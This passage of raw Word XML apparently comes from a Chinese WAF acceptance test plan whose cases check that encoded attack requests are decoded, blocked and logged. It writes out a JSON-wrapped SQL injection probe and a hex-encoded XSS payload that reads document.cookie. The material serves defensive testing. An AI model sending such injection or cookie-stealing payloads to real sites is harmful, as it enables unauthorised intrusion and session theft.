              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF成功识别编码后的攻击请求，拦截攻击流量并记录日志。</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164395" name="Picture 385164395"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="url_event_8194f6a501184daca88711fc5beef436_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId43"/>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96" name="Picture 385164396"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="url_event_8194f6a501184daca88711fc5beef436_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId44"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="17B7C9DA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="439FCE6F">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64BF3DEE">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EEB50DB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="00C76360">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C3C0FAC">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2732235C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4983589D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3489C8E3">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EC7273">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc21077809"/>
      <w:bookmarkStart w:id="93" w:name="_Toc81916112"/>
      <w:bookmarkStart w:id="94" w:name="_Toc580426421"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="9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4803C564">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1DEF7248">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="05FFF918">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>JSON 解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7A169CEE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="53B86598">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="641E5102">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构造JSON编码后的攻击请求发送至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应成功解码并产生攻击告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4604EC15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="508F432E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="23112B22">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B06EA6">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F91B217">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/show.php?id={</w:t>
            </w:r>
            <w:bookmarkStart w:id="95" w:name="OLE_LINK2"/>
            <w:bookmarkStart w:id="96" w:name="OLE_LINK1"/>
            <w:r>
              <w:t>"id":"31%20and%201=1"}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="95"/>
            <w:bookmarkEnd w:id="96"/>
          </w:p>
          <w:p w14:paraId="736A09BF">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察请求是否被记录，查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否记录攻击日志并观察p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否被解析。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B6668B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="45E1B9AB">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7F9CBF5E">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF成功识别编码后的攻击请求，拦截攻击流量并记录日志。</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164397" name="Picture 385164397"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="json_event_62717116e9204d19a6a3285ce3d3fce6_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId45"/>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398" name="Picture 385164398"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="json_event_62717116e9204d19a6a3285ce3d3fce6_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId46"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D42C73C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="62CC2027">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BFA52AE">
            <w:pPr>
              <w:pStyle w:val="154"/>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0AB6BD6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="65E22375">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F773777">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B97A2A8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5347B303">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B5499E1">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A01BDE">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc21077810"/>
      <w:bookmarkStart w:id="98" w:name="_Toc81916113"/>
      <w:bookmarkStart w:id="99" w:name="_Toc1356133073"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六进制转换</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="9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66E218C4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2459CB66">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="23DCC0ED">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>ex Encoding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0939B34D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0ADCFAC9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5A8DB3DB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构造</w:t>
            </w:r>
            <w:r>
              <w:t>HEX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编码后的攻击请求发送至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应成功解码并产生攻击告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52E82850">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="05A0432E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="703DE3A5">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实server 将WEB流量牵引至WAF检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11532A07">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对攻击p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行</w:t>
            </w:r>
            <w:r>
              <w:t>Hex</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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和被编码的字符串，比如用浏览器访问如下链接：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/?value=0x3c696d67207372633d78206f6e6572726f723d616c65727428646f63756d656e742e636f6f6b6965293e</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E801666">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察请求是否被记录，查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志并观察p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否被解码为编码之前的状态。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6DAACC25">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2F5F5610">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="777564D9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="100" w:name="OLE_LINK25"/>
            <w:bookmarkStart w:id="101" w:name="OLE_LINK26"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
